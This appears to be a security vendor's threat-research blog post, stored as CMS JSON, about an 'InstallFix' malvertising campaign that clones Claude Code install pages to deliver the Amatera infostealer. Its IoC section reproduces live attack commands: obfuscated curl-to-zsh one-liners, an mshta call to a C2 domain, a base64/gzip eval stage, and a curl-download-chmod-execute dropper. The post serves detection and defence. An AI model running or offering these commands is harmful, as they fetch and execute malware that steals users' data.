",[3442],{"type":1444},{},{"nodeType":1294,"data":3445,"content":3446},{},[3447,3451,3456],{"nodeType":1293,"value":3448,"marks":3449,"data":3450},"We're tracking a technique we're calling ",[],{},{"nodeType":1293,"value":3452,"marks":3453,"data":3455},"InstallFix",[3454],{"type":1444},{},{"nodeType":1293,"value":3457,"marks":3458,"data":3459},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":1351,"data":3461,"content":3465},{"target":3462},{"sys":3463},{"id":3464,"type":1356,"linkType":1357},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":1433,"data":3467,"content":3468},{},[],{"nodeType":1437,"data":3470,"content":3471},{},[3472],{"nodeType":1293,"value":3473,"marks":3474,"data":3476},"InstallFix Claude Code campaign teardown",[3475],{"type":1444},{},{"nodeType":1294,"data":3478,"content":3479},{},[3480],{"nodeType":1293,"value":3481,"marks":3482,"data":3483},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",[],{},{"nodeType":1294,"data":3485,"content":3486},{},[3487],{"nodeType":1293,"value":3488,"marks":3489,"data":3490},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",[],{},{"nodeType":1520,"data":3492,"content":3493},{},[3494],{"nodeType":1293,"value":3495,"marks":3496,"data":3497},"A new campaign targeting Claude Code",[],{},{"nodeType":1294,"data":3499,"content":3500},{},[3501],{"nodeType":1293,"value":3502,"marks":3503,"data":3504},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":1294,"data":3506,"content":3507},{},[3508],{"nodeType":1293,"value":3509,"marks":3510,"data":3511},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":1294,"data":3513,"content":3514},{},[3515],{"nodeType":1293,"value":3516,"marks":3517,"data":3518},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. ",[],{},{"nodeType":1294,"data":3520,"content":3521},{},[3522],{"nodeType":1293,"value":3523,"marks":3524,"data":3525},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":1294,"data":3527,"content":3528},{},[3529],{"nodeType":1293,"value":3530,"marks":3531,"data":3532},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":1351,"data":3534,"content":3538},{"target":3535},{"sys":3536},{"id":3537,"type":1356,"linkType":1357},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":1351,"data":3540,"content":3544},{"target":3541},{"sys":3542},{"id":3543,"type":1356,"linkType":1357},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":1294,"data":3546,"content":3547},{},[3548],{"nodeType":1293,"value":3549,"marks":3550,"data":3551},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. ",[],{},{"nodeType":1351,"data":3553,"content":3557},{"target":3554},{"sys":3555},{"id":3556,"type":1356,"linkType":1357},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":1520,"data":3559,"content":3560},{},[3561],{"nodeType":1293,"value":3562,"marks":3563,"data":3564},"Distribution via Google Ads",[],{},{"nodeType":1294,"data":3566,"content":3567},{},[3568],{"nodeType":1293,"value":3569,"marks":3570,"data":3571},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":1351,"data":3573,"content":3577},{"target":3574},{"sys":3575},{"id":3576,"type":1356,"linkType":1357},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":1351,"data":3579,"content":3583},{"target":3580},{"sys":3581},{"id":3582,"type":1356,"linkType":1357},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":1351,"data":3585,"content":3589},{"target":3586},{"sys":3587},{"id":3588,"type":1356,"linkType":1357},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":1351,"data":3591,"content":3595},{"target":3592},{"sys":3593},{"id":3594,"type":1356,"linkType":1357},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":1294,"data":3597,"content":3598},{},[3599,3603,3612],{"nodeType":1293,"value":3600,"marks":3601,"data":3602},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. This is one of the reasons that attackers are ",[],{},{"nodeType":1329,"data":3604,"content":3606},{"uri":3605},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[3607],{"nodeType":1293,"value":3608,"marks":3609,"data":3611},"doubling down on targeting ad manager accounts",[3610],{"type":1337},{},{"nodeType":1293,"value":3613,"marks":3614,"data":3615}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":1294,"data":3617,"content":3618},{},[3619,3624],{"nodeType":1293,"value":3620,"marks":3621,"data":3623},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[3622],{"type":1444},{},{"nodeType":1293,"value":3625,"marks":3626,"data":3627},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":1294,"data":3629,"content":3630},{},[3631],{"nodeType":1293,"value":3632,"marks":3633,"data":3634},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":1351,"data":3636,"content":3640},{"target":3637},{"sys":3638},{"id":3639,"type":1356,"linkType":1357},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":1520,"data":3642,"content":3643},{},[3644],{"nodeType":1293,"value":3645,"marks":3646,"data":3647},"The payload",[],{},{"nodeType":1294,"data":3649,"content":3650},{},[3651],{"nodeType":1293,"value":3652,"marks":3653,"data":3654},"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",[],{},{"nodeType":1536,"data":3656,"content":3657},{},[3658,3668,3678],{"nodeType":1540,"data":3659,"content":3660},{},[3661],{"nodeType":1294,"data":3662,"content":3663},{},[3664],{"nodeType":1293,"value":3665,"marks":3666,"data":3667},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":1540,"data":3669,"content":3670},{},[3671],{"nodeType":1294,"data":3672,"content":3673},{},[3674],{"nodeType":1293,"value":3675,"marks":3676,"data":3677},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":1540,"data":3679,"content":3680},{},[3681],{"nodeType":1294,"data":3682,"content":3683},{},[3684],{"nodeType":1293,"value":3685,"marks":3686,"data":3687},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":1294,"data":3689,"content":3690},{},[3691],{"nodeType":1293,"value":3692,"marks":3693,"data":3694},"The MacOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":1294,"data":3696,"content":3697},{},[3698],{"nodeType":1293,"value":3699,"marks":3700,"data":3702},"You can see the full list of IoCs at the end of the blog.   ",[3701],{"type":1444},{},{"nodeType":1294,"data":3704,"content":3705},{},[3706],{"nodeType":1293,"value":3707,"marks":3708,"data":3709},"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain claude[.]update-version[.]com.",[],{},{"nodeType":1351,"data":3711,"content":3715},{"target":3712},{"sys":3713},{"id":3714,"type":1356,"linkType":1357},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":1294,"data":3717,"content":3718},{},[3719],{"nodeType":1293,"value":3720,"marks":3721,"data":3722},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":1351,"data":3724,"content":3728},{"target":3725},{"sys":3726},{"id":3727,"type":1356,"linkType":1357},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":1520,"data":3730,"content":3731},{},[3732],{"nodeType":1293,"value":3733,"marks":3734,"data":3735},"Abusing legitimate hosting services",[],{},{"nodeType":1294,"data":3737,"content":3738},{},[3739,3743,3752],{"nodeType":1293,"value":3740,"marks":3741,"data":3742},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":1329,"data":3744,"content":3746},{"uri":3745},"https://phishing-techniques.pushsecurity.com/",[3747],{"nodeType":1293,"value":3748,"marks":3749,"data":3751},"detection evasion technique",[3750],{"type":1337},{},{"nodeType":1293,"value":2065,"marks":3753,"data":3754},[],{},{"nodeType":1294,"data":3756,"content":3757},{},[3758],{"nodeType":1293,"value":3759,"marks":3760,"data":3761},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. ",[],{},{"nodeType":1433,"data":3763,"content":3764},{},[],{"nodeType":1437,"data":3766,"content":3767},{},[3768],{"nodeType":1293,"value":3769,"marks":3770,"data":3772},"A broader trend",[3771],{"type":1444},{},{"nodeType":1294,"data":3774,"content":3775},{},[3776],{"nodeType":1293,"value":3777,"marks":3778,"data":3779},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":1536,"data":3781,"content":3782},{},[3783,3806,3829,3852],{"nodeType":1540,"data":3784,"content":3785},{},[3786],{"nodeType":1294,"data":3787,"content":3788},{},[3789,3792,3802],{"nodeType":1293,"value":37,"marks":3790,"data":3791},[],{},{"nodeType":1329,"data":3793,"content":3795},{"uri":3794},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[3796],{"nodeType":1293,"value":3797,"marks":3798,"data":3801},"Fake Claude artifacts used in traditional ClickFix lures",[3799,3800],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3803,"marks":3804,"data":3805},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":1540,"data":3807,"content":3808},{},[3809],{"nodeType":1294,"data":3810,"content":3811},{},[3812,3815,3825],{"nodeType":1293,"value":37,"marks":3813,"data":3814},[],{},{"nodeType":1329,"data":3816,"content":3818},{"uri":3817},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[3819],{"nodeType":1293,"value":3820,"marks":3821,"data":3824},"Fake Homebrew installation pages",[3822,3823],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3826,"marks":3827,"data":3828},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":1540,"data":3830,"content":3831},{},[3832],{"nodeType":1294,"data":3833,"content":3834},{},[3835,3838,3848],{"nodeType":1293,"value":37,"marks":3836,"data":3837},[],{},{"nodeType":1329,"data":3839,"content":3841},{"uri":3840},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[3842],{"nodeType":1293,"value":3843,"marks":3844,"data":3847},"Fake OpenClaw installers on GitHub",[3845,3846],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3849,"marks":3850,"data":3851},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":1540,"data":3853,"content":3854},{},[3855],{"nodeType":1294,"data":3856,"content":3857},{},[3858,3861,3871],{"nodeType":1293,"value":37,"marks":3859,"data":3860},[],{},{"nodeType":1329,"data":3862,"content":3864},{"uri":3863},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[3865],{"nodeType":1293,"value":3866,"marks":3867,"data":3870},"Trojanised npm packages",[3868,3869],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3872,"marks":3873,"data":3874},": Malicious packages mimicking Claude Code's official npm package name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":1294,"data":3876,"content":3877},{},[3878],{"nodeType":1293,"value":3879,"marks":3880,"data":3881},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",[],{},{"nodeType":1351,"data":3883,"content":3887},{"target":3884},{"sys":3885},{"id":3886,"type":1356,"linkType":1357},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":1433,"data":3889,"content":3890},{},[],{"nodeType":1520,"data":3892,"content":3893},{},[3894],{"nodeType":1293,"value":3895,"marks":3896,"data":3898},"How Push detects InstallFix",[3897],{"type":1444},{},{"nodeType":1294,"data":3900,"content":3901},{},[3902],{"nodeType":1293,"value":3903,"marks":3904,"data":3905},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":1294,"data":3907,"content":3908},{},[3909],{"nodeType":1293,"value":3910,"marks":3911,"data":3912},"Push sees what the user sees: the page as it renders in the browser, in real time. This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":1294,"data":3914,"content":3915},{},[3916],{"nodeType":1293,"value":3917,"marks":3918,"data":3919},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":1294,"data":3921,"content":3922},{},[3923,3927,3934,3937,3946,3950,3957],{"nodeType":1293,"value":3924,"marks":3925,"data":3926},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":1329,"data":3928,"content":3929},{"uri":2116},[3930],{"nodeType":1293,"value":2119,"marks":3931,"data":3933},[3932],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":3935,"data":3936},[],{},{"nodeType":1329,"data":3938,"content":3940},{"uri":3939},"https://pushsecurity.com/product-demo/",[3941],{"nodeType":1293,"value":3942,"marks":3943,"data":3945},"visit our demo library",[3944],{"type":1337},{},{"nodeType":1293,"value":3947,"marks":3948,"data":3949},", or ",[],{},{"nodeType":1329,"data":3951,"content":3952},{"uri":2129},[3953],{"nodeType":1293,"value":2132,"marks":3954,"data":3956},[3955],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":3958,"data":3959},[],{},{"nodeType":1433,"data":3961,"content":3962},{},[],{"nodeType":1437,"data":3964,"content":3965},{},[3966],{"nodeType":1293,"value":3967,"marks":3968,"data":3970},"IoCs",[3969],{"type":1444},{},{"nodeType":1294,"data":3972,"content":3973},{},[3974,3978,3987],{"nodeType":1293,"value":3975,"marks":3976,"data":3977},"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":1329,"data":3979,"content":3981},{"uri":3980},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[3982],{"nodeType":1293,"value":3983,"marks":3984,"data":3986},"quickly spin up and rotate the sites used",[3985],{"type":1337},{},{"nodeType":1293,"value":3988,"marks":3989,"data":3990}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":1294,"data":3992,"content":3993},{},[3994],{"nodeType":1293,"value":3995,"marks":3996,"data":3997},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":1294,"data":3999,"content":4000},{},[4001],{"nodeType":1293,"value":4002,"marks":4003,"data":4005},"Cloned domains:",[4004],{"type":1444},{},{"nodeType":1536,"data":4007,"content":4008},{},[4009,4019,4029,4039,4049,4059,4068,4078,4088,4097,4107,4117,4127,4137,4147,4157,4167,4176,4186,4196,4206],{"nodeType":1540,"data":4010,"content":4011},{},[4012],{"nodeType":1294,"data":4013,"content":4014},{},[4015],{"nodeType":1293,"value":4016,"marks":4017,"data":4018},"claud-code[.]pages[.]dev",[],{},{"nodeType":1540,"data":4020,"content":4021},{},[4022],{"nodeType":1294,"data":4023,"content":4024},{},[4025],{"nodeType":1293,"value":4026,"marks":4027,"data":4028},"claulastver[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4030,"content":4031},{},[4032],{"nodeType":1294,"data":4033,"content":4034},{},[4035],{"nodeType":1293,"value":4036,"marks":4037,"data":4038},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4040,"content":4041},{},[4042],{"nodeType":1294,"data":4043,"content":4044},{},[4045],{"nodeType":1293,"value":4046,"marks":4047,"data":4048},"hgjbulk.pages[.]dev",[],{},{"nodeType":1540,"data":4050,"content":4051},{},[4052],{"nodeType":1294,"data":4053,"content":4054},{},[4055],{"nodeType":1293,"value":4056,"marks":4057,"data":4058},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":1540,"data":4060,"content":4061},{},[4062],{"nodeType":1294,"data":4063,"content":4064},{},[4065],{"nodeType":1293,"value":4046,"marks":4066,"data":4067},[],{},{"nodeType":1540,"data":4069,"content":4070},{},[4071],{"nodeType":1294,"data":4072,"content":4073},{},[4074],{"nodeType":1293,"value":4075,"marks":4076,"data":4077},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4079,"content":4080},{},[4081],{"nodeType":1294,"data":4082,"content":4083},{},[4084],{"nodeType":1293,"value":4085,"marks":4086,"data":4087},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":1540,"data":4089,"content":4090},{},[4091],{"nodeType":1294,"data":4092,"content":4093},{},[4094],{"nodeType":1293,"value":4026,"marks":4095,"data":4096},[],{},{"nodeType":1540,"data":4098,"content":4099},{},[4100],{"nodeType":1294,"data":4101,"content":4102},{},[4103],{"nodeType":1293,"value":4104,"marks":4105,"data":4106},"cladueall[.]pages[.]dev",[],{},{"nodeType":1540,"data":4108,"content":4109},{},[4110],{"nodeType":1294,"data":4111,"content":4112},{},[4113],{"nodeType":1293,"value":4114,"marks":4115,"data":4116},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":1540,"data":4118,"content":4119},{},[4120],{"nodeType":1294,"data":4121,"content":4122},{},[4123],{"nodeType":1293,"value":4124,"marks":4125,"data":4126},"myclauda[.]it[.]com",[],{},{"nodeType":1540,"data":4128,"content":4129},{},[4130],{"nodeType":1294,"data":4131,"content":4132},{},[4133],{"nodeType":1293,"value":4134,"marks":4135,"data":4136},"vdsafsaf[.]it[.]com",[],{},{"nodeType":1540,"data":4138,"content":4139},{},[4140],{"nodeType":1294,"data":4141,"content":4142},{},[4143],{"nodeType":1293,"value":4144,"marks":4145,"data":4146},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":1540,"data":4148,"content":4149},{},[4150],{"nodeType":1294,"data":4151,"content":4152},{},[4153],{"nodeType":1293,"value":4154,"marks":4155,"data":4156},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":1540,"data":4158,"content":4159},{},[4160],{"nodeType":1294,"data":4161,"content":4162},{},[4163],{"nodeType":1293,"value":4164,"marks":4165,"data":4166},"claude-code-macos[.]com",[],{},{"nodeType":1540,"data":4168,"content":4169},{},[4170],{"nodeType":1294,"data":4171,"content":4172},{},[4173],{"nodeType":1293,"value":4085,"marks":4174,"data":4175},[],{},{"nodeType":1540,"data":4177,"content":4178},{},[4179],{"nodeType":1294,"data":4180,"content":4181},{},[4182],{"nodeType":1293,"value":4183,"marks":4184,"data":4185},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4187,"content":4188},{},[4189],{"nodeType":1294,"data":4190,"content":4191},{},[4192],{"nodeType":1293,"value":4193,"marks":4194,"data":4195},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4197,"content":4198},{},[4199],{"nodeType":1294,"data":4200,"content":4201},{},[4202],{"nodeType":1293,"value":4203,"marks":4204,"data":4205},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4207,"content":4208},{},[4209],{"nodeType":1294,"data":4210,"content":4211},{},[4212],{"nodeType":1293,"value":4213,"marks":4214,"data":4215},"notklmalans[.]pages[.]dev",[],{},{"nodeType":1294,"data":4217,"content":4218},{},[4219],{"nodeType":1293,"value":4220,"marks":4221,"data":4223},"Domains hosting malicious payload:",[4222],{"type":1444},{},{"nodeType":1536,"data":4225,"content":4226},{},[4227,4237,4247],{"nodeType":1540,"data":4228,"content":4229},{},[4230],{"nodeType":1294,"data":4231,"content":4232},{},[4233],{"nodeType":1293,"value":4234,"marks":4235,"data":4236},"contatoplus[.]com",[],{},{"nodeType":1540,"data":4238,"content":4239},{},[4240],{"nodeType":1294,"data":4241,"content":4242},{},[4243],{"nodeType":1293,"value":4244,"marks":4245,"data":4246},"sarahmoftah[.]com",[],{},{"nodeType":1540,"data":4248,"content":4249},{},[4250],{"nodeType":1294,"data":4251,"content":4252},{},[4253],{"nodeType":1293,"value":4254,"marks":4255,"data":4256},"claude[.]update-version[.]com",[],{},{"nodeType":1294,"data":4258,"content":4259},{},[4260],{"nodeType":1293,"value":4261,"marks":4262,"data":4264},"Commands:",[4263],{"type":1444},{},{"nodeType":1294,"data":4266,"content":4267},{},[4268],{"nodeType":1293,"value":4269,"marks":4270,"data":4273},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[4271],{"type":4272},"code",{},{"nodeType":1294,"data":4275,"content":4276},{},[4277],{"nodeType":1293,"value":37,"marks":4278,"data":4279},[],{},{"nodeType":1294,"data":4281,"content":4282},{},[4283],{"nodeType":1293,"value":4284,"marks":4285,"data":4287},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[4286],{"type":4272},{},{"nodeType":1294,"data":4289,"content":4290},{},[4291],{"nodeType":1293,"value":4292,"marks":4293,"data":4294},"\n",[],{},{"nodeType":1294,"data":4296,"content":4297},{},[4298],{"nodeType":1293,"value":4299,"marks":4300,"data":4302},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude ",[4301],{"type":4272},{},{"nodeType":1294,"data":4304,"content":4305},{},[4306,4309],{"nodeType":1293,"value":4292,"marks":4307,"data":4308},[],{},{"nodeType":1293,"value":4310,"marks":4311,"data":4313},"Base64 decoded url:",[4312],{"type":1444},{},{"nodeType":1294,"data":4315,"content":4316},{},[4317],{"nodeType":1293,"value":4318,"marks":4319,"data":4321},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[4320],{"type":4272},{},{"nodeType":1294,"data":4323,"content":4324},{},[4325],{"nodeType":1293,"value":37,"marks":4326,"data":4327},[],{},{"nodeType":1294,"data":4329,"content":4330},{},[4331],{"nodeType":1293,"value":4332,"marks":4333,"data":4335},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[4334],{"type":4272},{},{"nodeType":1294,"data":4337,"content":4338},{},[4339,4342],{"nodeType":1293,"value":4292,"marks":4340,"data":4341},[],{},{"nodeType":1293,"value":4343,"marks":4344,"data":4346},"Second stage:",[4345],{"type":1444},{},{"nodeType":1294,"data":4348,"content":4349},{},[4350],{"nodeType":1293,"value":4351,"marks":4352,"data":4354},"#!/bin/zsh",[4353],{"type":4272},{},{"nodeType":1294,"data":4356,"content":4357},{},[4358],{"nodeType":1293,"value":4359,"marks":4360,"data":4362},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | gunzip",[4361],{"type":4272},{},{"nodeType":1294,"data":4364,"content":4365},{},[4366],{"nodeType":1293,"value":4367,"marks":4368,"data":4370},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[4369],{"type":4272},{},{"nodeType":1294,"data":4372,"content":4373},{},[4374],{"nodeType":1293,"value":4375,"marks":4376,"data":4378},"PAYLOAD_END",[4377],{"type":4272},{},{"nodeType":1294,"data":4380,"content":4381},{},[4382],{"nodeType":1293,"value":4383,"marks":4384,"data":4386},")",[4385],{"type":4272},{},{"nodeType":1294,"data":4388,"content":4389},{},[4390],{"nodeType":1293,"value":4391,"marks":4392,"data":4394},"eval \"$mkgrc9\"",[4393],{"type":4272},{},{"nodeType":1294,"data":4396,"content":4397},{},[4398,4401],{"nodeType":1293,"value":4292,"marks":4399,"data":4400},[],{},{"nodeType":1293,"value":4402,"marks":4403,"data":4405},"Binaries:",[4404],{"type":1444},{},{"nodeType":1294,"data":4407,"content":4408},{},[4409],{"nodeType":1293,"value":4351,"marks":4410,"data":4412},[4411],{"type":4272},{},{"nodeType":1294,"data":4414,"content":4415},{},[4416],{"nodeType":1293,"value":4417,"marks":4418,"data":4420},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[4419],{"type":4272},{},{"entries":4422},{"hyperlink":4423,"inline":4424,"block":4425},[],[],[4426,4446,4480,4486,4494,4501,4507,4513,4521,4564,4570,4591,4633],{"sys":4427,"__typename":4428,"content":4429,"name":4445,"title":118},{"id":3420},"InsightTextBlockComponent",{"json":4430},{"nodeType":1295,"data":4431,"content":4432},{},[4433],{"nodeType":1294,"data":4434,"content":4435},{},[4436,4441],{"nodeType":1293,"value":4437,"marks":4438,"data":4440},"Update March 16:",[4439],{"type":1444},{},{"nodeType":1293,"value":4442,"marks":4443,"data":4444}," We've identified a number of additional InstallFix pages targeting both the Claude Code docs page (as opposed to the quickstart guide) and NotebookLM, a research and note taking tool from Google. New IoCs have been added accordingly, but this campaign is moving very quickly, so the list won't stay up to date for long. ",[],{},"installfix insight box 5",{"sys":4447,"__typename":4428,"content":4448,"name":4479,"title":118},{"id":3464},{"json":4449},{"data":4450,"content":4451,"nodeType":1295},{},[4452,4472],{"data":4453,"content":4454,"nodeType":1294},{},[4455,4459,4468],{"data":4456,"marks":4457,"value":4458,"nodeType":1293},{},[],"Feeling *Fix fatigue? Us too. But we felt the naming appropriate to indicate that this is part of the same family of techniques. ClickFix has become synonymous with ",{"data":4460,"content":4462,"nodeType":1329},{"uri":4461},"https://attack.mitre.org/techniques/T1204/004/",[4463],{"data":4464,"marks":4465,"value":4467,"nodeType":1293},{},[4466],{"type":1337},"Malicious Copy and Paste",{"data":4469,"marks":4470,"value":4471,"nodeType":1293},{},[],", even though most lures haven’t been related to “fixing” anything for a while now. The user action is essentially the same, just the context of the lure is different. ",{"data":4473,"content":4474,"nodeType":1294},{},[4475],{"data":4476,"marks":4477,"value":4478,"nodeType":1293},{},[],"But while traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn't need any of that. The pretext is simply the user wanting to install legit software.","installfix insight box 3",{"sys":4481,"__typename":4482,"title":4483,"arcadeDemoUrl":4484,"playText":4485},{"id":3537},"ArcadeDemo","InstallFix clickthrough demo","https://demo.arcade.software/w9lLXrpwl5E19eQMEcPb?embed","20 secs",{"sys":4487,"__typename":4488,"title":4489,"caption":4489,"layoutMode":118,"file":4490},{"id":3543},"Image","Comparison of the legit page and install commands versus a malicious clone",{"url":4491,"width":4492,"height":4493},"https://images.ctfassets.net/y1cdw1ablpvd/27TYctONO1xi4dAh0lBeYS/36d88361bbb6568410af6d95b829b4d8/image4.png",1999,588,{"sys":4495,"__typename":4488,"title":4496,"caption":4496,"layoutMode":118,"file":4497},{"id":3556},"When interacting with some of the detected pages, the user is redirected back to the legitimate site, lowering suspicion",{"url":4498,"width":4499,"height":4500},"https://images.ctfassets.net/y1cdw1ablpvd/17m5qsbzkBXFHumXDG8Kur/50d42f3c42092cba3082c4221a0857b0/image1.gif",1280,720,{"sys":4502,"__typename":4488,"title":4503,"caption":118,"layoutMode":118,"file":4504},{"id":3576},"Cloned page 